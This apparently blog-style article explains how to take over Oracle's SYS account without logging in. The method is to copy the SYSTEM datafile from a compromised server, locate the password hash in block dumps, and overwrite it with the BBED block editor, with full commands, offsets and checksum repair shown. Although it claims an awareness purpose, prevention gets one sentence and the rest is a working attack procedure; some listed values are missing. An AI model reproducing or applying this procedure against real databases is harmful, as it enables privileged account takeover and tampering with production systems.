"Fixing" SYS for hacking purposes


How does one change Oracle's SYS password without having to login into the database? Is it possible?
The answer is, YES! All you need is a binary fiile editor and some knowledge of Oracle's internals.

This document is to be used only for testing purposes and should not be used in a production environment. The purpose is to show the audience how hackers can gain access to your system without knowing it - and how to prevent it.

As I said earlier, I am not going to use SQL to access the production database. In order to get the necessary information about the SYS user, I will copy the production system datafile to my test server using rcp, sftp or any other utility (assumption here is that we already have gained access to database server).

Using my test Oracle instance and the ALTER SYSTEM DUMP DATAFILE command I will get formatted dumps of the datafile. Dumping more blocks at once will speed up the whole process since I do not know which Oracle block has the password hash value for the SYS user.

The command used to dump more than one blocks at once is:

alter system dump datafile block min block max ;

Here is an example:

alter system dump datafile '/ora-main/oradata/test/data/system_01.dbf' block min 1 block max 60;

This command can be performed with instance in nomunt state. Trace file will be located in the user dump directory.

NOTE: For more information on Oracle dumps, please check my previous paper named "Oradebug – Undocumented Oracle Utility".

The formatted dump has all values needed to modify the SYS password on the production server. We need the following three values:



Each block of an Oracle data file is formatted with a fixed header that contains information about the particular block. This information provides a means to ensure the integrity for each block and in turn, the entire Oracle database. One component of the fixed header of a data block is called a Relative Data Block Address (DBA). This DBA is a 4 bytes that stores the relative file number of the Oracle database file and the Oracle block number offset relative
to the beginning of the file. (Presley, 1993).

How RDBA is mapped:


rdba: 0x0b52fbf6 (45/1244150)

Bin mode representation of these numbers might give you a clue:

0b52fbf6 1011010100101111101111110110 
1244150              100101111101111110110 
45          101101

3) OFFSET - The offset is relative to the block already set.

I am not going into great details how to find these values. There is a way to do it and all you need knowledge about Oracle internals but do not try it unless you know what are you doing.

Here is excerpt from the formatted block. Important values are highlighted:

buffer rdba: 0x00400036 (1/54)                                                 RDBA
scn: 0x0000.00070afd seq: 0x01 flg: 0x06 tail: 0x0afd0601
frmt: 0x02 chkval: 0x97e0 type: 0x06=trans data

tab 1, row 1, @0x18f5   - OFFSET 
col  1: [ 2]  c1 02
col  2: [16]  34 44 45 34 32 37 39 35 45 36 36 31 31 37 41 45  (Password hash value )
col  3: [ 1]  80
col  4: [ 1]  80
col  5: [ 7]  78 69 0b 0a 11 19 2a
col  6: [ 7]  78 69 0c 1b 11 09 03
col  7: *NULL*
col  8: *NULL*
col  9: [ 1]  80
col 10: *NULL*
col 11: [ 2]  c1 02

It’s time to pick a new SYS password. Again, using my test database I will generate a new password hash value.

SQL> alter user sys identified by testpass;

User altered.

SQL> select password from dba_users where username='SYS';


This hash value will be used for a new password.
You all know the trick how to temporary change user password and return it back using same password hash value:

e.g. alter user sys identified by values ‘E2A109347F6C7832’;

Big question left: how to change password hash value on production database server without having to login into a database? In this case my choice is BBED (Block Browser Editor). This is Oracle internal tool used to modify data blocks. It has been around for a while. It’s still there in release 10.2. BBED is password protected but unfortunately with a very weak password.

More information about this tool you can find in a reference [2].

The following scenario is happening on production database server.

Login into BBED:

BBED> info
 File#  Name                                                        Size(blks)
 -----  ----                                                        ----------
     1  /ora-main/oradata/test/data/system_01.dbf                   256004

The RDBA, offset and password hash value is already known.

BBED> set file 1
        FILE#           1

BBED> set block 54
        BLOCK#          54

BBED> set offset 6389                         
        OFFSET          6389

BBED> p kdbr
sb2 kdbr[0]                                 @118      8074
sb2 kdbr[1]                                 @120      8009

sb2 kdbr[20]                                @158      5965
sb2 kdbr[21]                                @160      8030
sb2 kdbr[22]                                @162      6389  -   offset  ( 0x18f5 ) 
sb2 kdbr[23]                                @164      7838

BBED> p*kdbr[22]    
ub1 rowdata[561]                            @6481     0x6c

BBED> x/r
rowdata[561]                                @6481
flag@6481: 0x6c (KDRHFL, KDRHFF, KDRHFH, KDRHFC)
lock@6482: 0x00
cols@6483:   17
ckix@6484:    1

col    1[2] @6489:  0xc1  0x02
col   2[16] @6492:  0x34  0x44  0x45  0x34  0x32  0x37  0x39  0x35  0x45  0x36
 0x36  0x31  0x31  0x37  0x41  0x45
col    3[1] @6509:  0x80
col    4[1] @6511:  0x80
col    5[7] @6513:  0x78  0x69  0x0b  0x0a  0x11  0x19  0x2a
col    6[7] @6521:  0x78  0x69  0x0c  0x1b  0x11  0x09  0x03

BBED> x/rn2cntn   ( this command will show rows  )
rowdata[561]                                @6481
flag@6481: 0x6c (KDRHFL, KDRHFF, KDRHFH, KDRHFC)
lock@6482: 0x00
cols@6483:   17
ckix@6484:    1

col    1[2] @6489: Á.
col   2[16] @6492: 4DE42795E66117AE  (34 44 45 34 32 37 39 35 45 36 36 31 31 37 41 45
col    3[1] @6509: 0
col    4[1] @6511:  0x80
col    5[7] @6513: -0
col    6[7] @6521: -0

Dump file to be sure that you are editing correct data:

BBED> dump/v  dba 1,54 offset 6389 count 150
File: /ora-main/oradata/test/data/system_01.dbf (1)
Block: 54                                Offsets: 6389 to 6538                            Dba:0x00400036
01800180 0778690b 160f3a11 ffffff01 80ff02c1 02ffff01 80018016 44454641 l .....xi...:........Á........DEFA554c545f
434f4e53 554d4552 5f47524f 5550ac00 01000100 01004000 36001000 l ULT_CONSUMER_GROUP¬.......@.6...40003600 1002c111
6c000705 01800180 03c20346 01800180 01800180 6c001101 l@.6...Á.l........Â.F........l...
03535953 02c10210 34444534 32373935 45363631 31374145 01800180 0778690b l .SYS.Á..4DE42795E66117AE.....xi.0a11192a
0778690c 1b110903 ffff0180 ff02c102

Find correct offset:

BBED> find /c 4DE42795E66117AE
File: /ora-main/oradata/test/data/testsystem_01.dbf (1)
Block: 54                                 Offsets: 6493 to 6508                             Dba:0x00400036
34444534 32373935 45363631 31374145

<48 bytes per line>

Offset for a this string is 6493. One more check before modifying:

BBED> dump/v  dba 1,54 offset 6493 count 16
File: /ora-main/oradata/test/data/testsystem_01.dbf (1)
Block: 54                                Offsets: 6493 to 6508                            Dba:0x00400036
34444534 32373935 45363631 31374145                                     l 4DE42795E66117AE

Now I am positive that this is an offset that needs to be modified.

I will modify block using password hash value ( E2A109347F6C7832 ) previously generated on my test database;

BBED> modify/c E2A109347F6C7832 dba 1,54 offset 6493
Warning: contents of previous BIFILE will be lost. Proceed? (Y/N) y
File: /ora-main/oradata/test/data/testsystem_01.dbf (1)
Block: 54               Offsets: 6493 to 6508           Dba:0x00400036
45324131 30393334 37463643 37383332

Dump block to acknowledge change:

BBED> dump/v  dba 1,54 offset 6493 count 16
File: /ora-main/oradata/test/data/testsystem_01.dbf (1)
Block: 54                                Offsets: 6493 to 6508                            Dba:0x00400036
45324131 30393334 37463643 37383332                                     l E2A109347F6C7832

Change is there. And finally apply changes to the block:

BBED> sum dba 1,54
Check value for File 1, Block 54:
current = 0x97e0, required = 0x919b

BBED> sum dba 1,54 apply
Check value for File 1, Block 54:
current = 0x919b, required = 0x919b

It’s time to test new password. Login into production database using new password:

SQL> conn sys/testpass

And select confirms new password hash value:

SQL> select password from dba_users where username='SYS';



To conclude, a hacker can damage you production system if you don't protect your database files. If left unprotected, a hacker can easily change passwords and other settings with a binary editor like BBED without you knowing it.

No liability for the contents of these documents can be accepted. Use the concepts, examples and other content at your own risk. As this is a first version, there may be errors and inaccuracies that may of course be damaging to your system. Proceed with caution, and although this is highly unlikely, the author does not take any responsibility for that.


[1] Oradebug – Undocumented Oracle Utility - Miladin Modrakovic

[2] Disassembling the Oracle Date Block - Graham Thornton